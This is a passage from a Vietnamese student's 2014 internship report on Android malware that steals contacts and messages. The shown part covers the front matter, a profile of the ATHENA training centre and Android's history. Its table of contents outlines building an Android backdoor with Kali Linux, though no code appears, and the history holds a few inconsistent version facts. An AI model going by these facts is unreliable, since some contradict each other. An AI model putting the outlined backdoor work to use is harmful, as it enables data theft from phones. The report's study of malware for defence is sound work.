bao cao giua ki

82
1 BÁO CÁO THỰC TẬP GIỮA KÌ Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài Sinh viên thực hiện : Nguyễn Hoàng Thạch GVHD: Võ Đỗ Thng TP.HCM, ngày 9 tháng 8 năm 2014

Upload: thach28

Post on 02-Jul-2015

82 views

Category:

Education


6 download

TRANSCRIPT

Page 1: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

1

BÁO CÁO THỰC TẬP GIỮA KÌ

Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ

liệu như danh sách contact, tin nhắn trên điện thoại sử

dụng Android và gửi ra ngoài

Sinh viên thực hiện :Nguyễn Hoàng Thạch

GVHD: Võ Đỗ Thắng

TP.HCM, ngày 9 tháng 8 năm 2014

Page 2: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

2

NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

TPHCM, ngày ... tháng ... năm 2014

Giáo viên hướng dẫn

Page 3: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

3

NHẬN XÉT CỦA KHOA

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

………………………………………………………………………………………

TPHCM, ngày ... tháng ... năm 2014

Trưởng Khoa

Page 4: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

4

Lời Nói Đầu

Hiện nay có nhiều hệ điều hành mới dành cho các thiết bị điện thoại di động, tablet để thay thế

cho những hệ điều hành cũ lõi thời. Như Apple có hệ điều hành IOS, Nokia có hệ điều hành

Window Phone, SamSung sử dụng hệ điều hành Android. Trong đó đáng kể nhất phải nói đến

Android, tuy mới bước chân vào làng điện thoại di động nhưng Android đã lần lượt hạ gục các

đối thũ tầm cỡ và trở thành hệ điều hành có tốc độ tăng trưởng cũng như chiếm thị phần lớn nhất

trên thế giới. Mỗi phiên bản của Android luôn thu hút mối quan tâm của giới công nghệ, các nhà

sản xuất và người sử dụng. Tuy vậy hệ điều hành Android cũng là hệ điều hành dễ bị các Hacker

khai thác nhất, vì vậy việc bảo đảm an toàn và hệ thống bảo mật trên Android là vấn đề đau đầu

của người dùng hiện nay. Với sự nhẹ dạ cả tin, thiếu hiểu biết của người dùng, lòng tham các

các thứ “Free” như free app, free wifi đã vô tình tiếp tay cho các Hacker xâm nhập và cài đặt mã

độc trên chính chiếc điện thoại của bạn.

Sơ đồ thể hiện sự tăng mạnh của mã độc Android

Hôm nay mình viết bài báo cáo về đề tài “Nghiên cứu các trojan, malware cho phép đánh cắp dữ

liệu như danh sách contact, tin nhắn trên điện thoại Android và gửi ra ngoài” để cùng nghiên

cứu, tìm hiểu cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng

tránh.

Page 5: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

5

Lời Cảm Ơn

Chúng em xin chân thành cảm ơn thầy Võ Đỗ Thắng đã tận tình giúp đỡ, hướng dẫn và

cung cấp tài liệu liên quan đến đồ án này

Xin chân thành cảm ơn Trung Tâm Athena đã tạo điều kiện thuận lợi trong học tập cũng

như trong quá trình làm đồ án thực tập này.

Chúng em cũng gửi lời cảm ơn chân thành tới các thầy cô trong Trung Tâm đã tận tình

giảng dạy, trang bị cho chúng em những kiến thức quý báu trong những tháng vừa qua.

Cảm ơn các thầy cô và bạn bè đã góp ý và giúp đỡ tận tình xây dựng đồ án này.

Xin chân thành cảm ơn!

TPHCM, ngày 9 tháng 8 năm 2014

Sinh viên thực tập

Nguyễn Hoàng Thạch

Page 6: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

6

MỤC LỤC

PHẦN 1: GIỚI THIỆU DOANH NGHIỆP THỰC TẬP ................................ ................................ ..8

CHƯƠNG I: GIỚI THIỆU DOANH NGHIỆP THỰC TẬP – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ

ATHENA............................................................................................................................................. 8

1. Trụ sở và các chi nhánh: ......................................................................................................... 9

1.1. Trụ sở chính: ................................................................................................................... 9

1.2. Cơ sở 2 Tại TP Hồ Chí Minh: ........................................................................................... 9

2. Quá trình hình thành và phát triển của trung tâm: ................................................................. 9

3. Cơ cấu tổ chức:..................................................................................................................... 11

4. Các sản phẩm, giải pháp: ..................................................................................................... 11

4.1. Các khóa học dài hạn:................................................................................................... 11

4.2. Các khóa học ngắn hạn:................................................................................................ 11

Khóa Quản trị mạng : ........................................................................................................... 11

Khóa thiết kế web và bảo mật mạng .................................................................................... 12

4.3. Các sản phẩm khác ....................................................................................................... 12

4.4. Cơ sở hạ tầng ................................................................................................................ 12

4.5. Các dịch vụ hỗ trợ:........................................................................................................ 13

5. Khách hàng .......................................................................................................................... 13

6. Đối tác .................................................................................................................................. 13

CHƯƠNG II.CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP ..................................................................... 13

PHẦN 2: NỘI DUNG THỰC TẬP ................................ ................................ ...................... 14

CHƯƠNG I: LÀM TRÊN LOCAL HOST........................................................................................................... 14

1. Tổng quan về Android .......................................................................................................... 14

1.1 Khái niệm. ..................................................................................................................... 14

1.2 Đặc điểm. ..................................................................................................................... 14

1.3 Lịch sử phát triển.......................................................................................................... 15

1.4 Sự ra mắt các phiên bản Android ................................................................................. 17

1.5 Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lâp................................. 18

1.5.1. Cài đặt Java SE trên máy tính..................................................................................... 18

1.5.2. Cài đặt Eclipse và Android SDK .................................................................................. 23

1.5.3. Tạo máy AVD (Android Virtual Device). ..................................................................... 26

1.6 So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x. ......................................... 30

1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt. ......................................... 30

1.6.2. Sự khác nhau về giao diện. ........................................................................................ 31

1.6.3. Sự khác nhau về tính năng. ....................................................................................... 32

Page 7: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

7

1.6.4. Sự khác nhau về giao thức mạng. .............................................................................. 33

2. Mã độc trên Android. ........................................................................................................... 33

2.1. Định nghĩa: ................................................................................................................... 33

2.2. Mã độc trong môi trường Android: .............................................................................. 33

2.2.1. Android là một môi trường lý tưởng cho mã độc phát triển. ..................................... 33

2.2.2. Phân loại mã độc Android. ........................................................................................ 34

2.3. Thực trạng .................................................................................................................... 34

2.4. Malware – tiêu biểu của trên Android.......................................................................... 35

2.4.1. Cơ chế hoạt động của Malware. ................................................................................ 36

2.4.2. Mục đích của Malware DroidDream .......................................................................... 37

2.5. Cơ chế bảo mật trong Android. .................................................................................... 37

2.5.1. Tính bảo mật trong Android ...................................................................................... 37

2.5.2. Cơ chế Permission: .................................................................................................... 37

2.5.3. Google Play: .............................................................................................................. 37

3. Cài đặt một số chương trình có mã độc trên Android. .......................................................... 38

3.1. iCalendar ...................................................................................................................... 38

3.1.1. Các công cụ cần thiết: ............................................................................................... 38

3.1.2. Các bước thực hiện: .................................................................................................. 38

3.2. iMatch .......................................................................................................................... 45

3.2.1. Các công cụ cần thiết: ............................................................................................... 45

3.2.2. Các bước thực hiện: .................................................................................................. 45

4. Nghiên cứu Kali Linux, cách tạo mã độc trên Kali Linux để xâm nhập vào máy Android........ 47

4.1. Tổng quan..................................................................................................................... 48

4.2. Cải tiến của Kali Linux so với Backtrack. ....................................................................... 48

4.3. Cài đặt Kali Linux........................................................................................................... 49

4.3.1. Chuẩn bị. ................................................................................................................... 49

4.3.2. Cài đặt. ...................................................................................................................... 49

4.4. Tạo mã độc trên Kali Linux để xâm nhập Android. ....................................................... 66

4.4.1. Tạo lập Backdoor....................................................................................................... 68

4.4.2. XSSF........................................................................................................................... 75

CHƯƠNG II: KẾT LUẬN........................................................................................................................... 82

Page 8: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

8

Phần 1: Giới thiệu doanh nghiệp thực tập

Chương I: Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An

Ninh Mạng Quốc Tế ATHENA.

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công

ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG

TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số

4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.

Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK

SECURITY COMPANY LIMITED.

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh

nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến

trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:

Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,...

Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành

riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng,

doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân

lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo

mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.

Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất

kinh doanh.

Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ

liệu thông tin về các ứng dụng và sự cố mạng.

Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự

cố máy tính.

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm

nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ

Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các

tỉnh,…

Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với

nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, HọcViệnAn Ninh Nhân Dân(

Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật

Quân Sự...

Page 9: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

9

1. Trụ sở và các chi nhánh:

1.1. Trụ sở chính:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Điện thoại: ( 84-8 ) 3824 4041

Hotline: 0943 23 00 99.

1.2. Cơ sở 2 tại TP Hồ Chí Minh:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.

Website: www.athena.edu.vn

Điện thoại: ( 84-8 ) 2210 3801

Hotline: 0943 20 00 88.

2. Quá trình hình thành và phát triển của trung tâm:

Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công

nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin

nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng

với tầm nhìn xa về tương lai của ngành công nghệ thông tin , họ đã quy tụ được một lực

lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho

các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội

ngũ cán bộ công nghệ thông tin cho đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:

Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.

Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT.

Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của Ngân hàng.

Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành

viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.

Page 10: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

10

Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành

một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và

đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project

2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh

viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa

đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của

đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động

cung cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện

tại Đà Nẵng.

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh tại

Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia

an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc,

đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực

công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên

của trung tâm.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng

hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế

Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ

thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả

phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm

khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước.

Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung

tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới

và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đãgiúp ông Thắng vượt

qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.

Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản

trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung

tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung

cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào

tiến trình tin học hóa nước nhà.

Page 11: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

11

3. Cơ cấu tổ chức:

Hình 1. Sơ đồ tổ chức công ty.

4. Các sản phẩm, giải pháp:

4.1. Các khóa học dài hạn:

- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security

specialist.

- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician.

- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.

4.2. Các khóa học ngắn hạn:

Khóa Quản trị mạng :

- Quản trị mạng Microsoft căn bản ACBN

- Phần cứng máy tính, laptop, server

- Quản trị hệ thống mạng Microsoft MCSA Security.

Page 12: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

12

- Quản trị mạng Microsoft nâng cao MCSE

- Quản trị window Vista

- Quản trị hệ thống Window Server 2008, 2012

- Lớp Master Exchange Mail Server

- Quản trị mạng quốc tế Cissco CCNA

- Quản trị hệ thống mạng Linux 1 và Linux 2.

Khóa thiết kế web và bảo mật mạng

- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart

- Lập trình web với Php và MySQL

- Bảo mật mạng quốc tế ACNS

- Hacker mũ trắng

- Athena Mastering Firewall Security

- Bảo mật website.

4.3. Các sản phẩm khác

- Chuyên đề thực hành sao lưu và phục hồi dữ liệu

- Chuyên đề thực hành bảo mật mạng Wi_Fi

- Chuyên đề Ghost qua mạng

- Chuyên đề xây dựng và quản trị diễn đàn

- Chuyên đề bảo mật dữ liệu phòng chống nội gián

- Chuyên đề quản lý tài sản công nghệ thông tin

- Chuyên đề kỹ năng thương mại điện tử.

4.4. Cơ sở hạ tầng

- Thiết bị đầy đủ và hiện đại.

- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ

mới nhất.

- Phòng máy rộng rãi, thoáng mát.

Page 13: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

13

4.5. Các dịch vụ hỗ trợ:

- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn

- Giới thiệu việc làm cho mọi học viên

- Thực tập có lương cho học viên khá giỏi

- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời

gian

- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng

máy tính, bảo mật mạng

Hỗ trợ thi Chứng chỉ Quốc tế.

5. Khách hàng

- Mọi đối tượng chuyên hoặc không chuyên về CNTT.

- Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ công

nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

6. Đối tác

Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự

CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn

vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính...

Chương II.Các nhiệm vụ và dịch vụ của bộ phận thực tập

Bộ phận thực tập : Bộ phận triển khai kỹ thuật.

Nhiệm vụ và dịch vụ:

Triển khai lắp đặt hệ thống mạng.

Bảo trì hệ thống mạng.

Tư vấn hỗ trợ quản trị hệ thống mạng.

Page 14: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

14

Phần 2: Nội dung thực tập

Chương I: Làm trên local host

1. Tổng quan về Android

1.1 Khái niệm.

Android là một hệ điều hành mã nguồn mở xây dựng trên nền tảng Linux, chủ yếu sử dụng

trên các thiết bị thông minh như điện thoại di động, máy tính bảng (và hiện nay là cả các đầu

phát HD, smart TV …). Trước đây, Android được phát triển bởi công ty liên hợp Android sau

đó được Google mua lại vào năm 2005. Theo ComScore, đến đầu tháng 3 năm 2014, Android

chiếm 51.7% thị phần hệ điều hành trên smartphone tại Mỹ (iOS chiếm 41.6%), là hệ điều hành

số một trên điện thoại thông minh.

Hình 1:Logo Android

Android ra mắt vào năm 2007 cùng với sự tuyên bố thành lập Liên minh thiết bị cầm tay

mở gồm 78 công ty phần cứng, phần mềm và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn

mở cho các thiết bị di động. Hệ điều hành Android bao gồm 12 triệu dòng mã: 3 triệu dòng

XML, 2.8 triều dòng mã C, 1.75 triệu dòng mã C++ và 2.1 triệu dòng mã Java. Thể hiện tính mở

của Android, Google công bố hầu hết các mã nguôn của Android theo bản cấp phép Apache.

1.2 Đặc điểm.

Tính mở: Ngay từ ban đầu, Android ra mắt là một hệ điều hành mã nguôn mở, được xây

dựng trên nhân Linux mở sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với

môi trường di động; nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Tính

mở hoàn toàn của Android cho phép người phát triển tạo các ứng dụng hấp dẫn với đầy đủ các

Page 15: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

15

điểm mạnh của các thiết bị cầm tay hiện có. Hơn nữa, một ứng dụng trong Android có thể gọi

tới bất kỳ một chức năng lõi nào như tạo cuộc gọi, gửi tinh nhắn hay sử dụng máy ảnh… cho

phép người phát triển tạo phần mềm phong phú hơn, dễ dàng liên kết các tính năng cho người

dùng. Những nền tảng ưu điểm này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các

ứng di động hoàn hảo.

Tính ngang bằng của ứng dụng: Với Android, không có sự khác nhau giữa các ứng dụng

điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới

một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng

Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn

hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn

điện thoại chỉ xem những ảnh mình thích.

Phá vỡ rào cản phát triển ứng dụng: Android phá vỡ rào cản để tạo ứng dụng mới và cải

tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá

nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho

người khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người

dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập

trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS.

Xây dựng ứng dụng dễ dàng và nhanh chóng: Android cung cấp bộ thư viện giao diện lập

trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android có thể cho

phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để

có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một

bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.

1.3 Lịch sử phát triển

Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào tháng 10 năm

2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập Tổng công ty

Viễn thông Wildfire) Nick Sears (từng là Phó giám đốc T-Mobile),và Chris White (trưởng thiết

kế và giao diện tại WebTV) để phát triển, theo lời của Rubin, "các thiết bị di động thông minh

hơn có thể biết được vị trí và sở thích của người dùng".DÙ những người thành lập và nhân viên

đều là những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ

rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh

phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng

từ chối tham gia vào công ty.

Page 16: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

16

Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một bộ

phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm Rubin,

Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm đó không

có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự tính tham gia

thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát

triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này

cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển

chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối

tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau.

Ngày 5 tháng 11 năm 2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp

hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn

Broadcom, Google, HTC, Intel,LG, Tập đoàn Marvell

Technology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-

Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng

ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng

thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android

đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu trưng của hệ

điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại

California vẽ.

Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ sung

các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được đặt

tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng, ví dụ như phiên bản

1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản Donut (bánh vòng). Phiên bản

mới nhất là 4.2 Jelly Bean (kẹo dẻo).

Page 17: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

17

Hình 2: Các phiên bản Android

Vào năm 2010, Google ra mắt loạt thiết bị Nexus, một dòng sản phẩm bao gồm điện thoại thông

minh và máy tính bảng chạy hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã

hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó

nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính

bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng

Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng và phần

mềm mới nhất của Android.

1.4 Sự ra mắt các phiên bản Android

Android alpha: là phiên bản nội bộ trong Google và OHA được nghiên cứu và phát triển

trước khi Android beta ra mắt, với các phiên bản khác nhau là "Astro Boy", "Bender" và "R2-

D2".

Android beta: được phát hành vào ngày 5 tháng 7 năm 2007. Tiếp theo đó bộ phát triển

phần mềm (SDK) ra mắt ngày 12 tháng 11 năm 2007.

Android 1.0 (API mức độ 1): Kỉ nguyên Android chính thức khởi động vào ngày 22

tháng 10 năm 2008, khi mà chiếc điện thoại T-Mobile G1 chính thức được bán ra ở Mỹ. Đến

ngày 23 tháng 9 năm 2008, Google chính thức bán ra phiên bản thương mại của phần mềm.

Page 18: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

18

Android 1.1 (API mức độ 2): phát hành ngày 9 tháng 2 năm 2009. Đây là bản cập nhật

đầu tiên giúp giải quyết lỗi, thay đổi Android API và thêm vào một số tính năng.

Android 1.5 (API mức độ 3, phát hành ngày 27 tháng 4 năm 2009) và Android 1.6 (API

mức độ 4, phát hành ngày 15 tháng 9 năm 2009): Bản cập nhật bao gồm một số tính năng mới

và sử đổi giao diện người dùng UI.

Android 2.x (2.0-2.1 API mức độ 7, 2.2 API mức độ 8, 2.3-2.3.2 API mức độ 9, 2.3.3-

2.3.7 API mức độ 10): phát hành từ tháng 10 năm 2009 đến tháng 2 năm 2011 với nhiều tính

năng mới được thêm vào, thay đổi giao diện người dùng cũng như nâng cao khả năng bảo mật.

Android 3.x (3.1 API mức độ 12, 3.2 API mức độ 13) phát hành từ tháng 5 đến tháng 7

năm 2011 với tên gọi Honeycomb là phiên bản dành riêng cho máy tính bảng. Mặc dù không để

lại nhiều dấu ấn đắc biệt trên thị trường nhưng phiên bản này là nền tảng cho Android 4.0.

Android 4.x (từ API mức độ 15 đến API mức độ 19) phát hành từ tháng 12 năm 2011 và

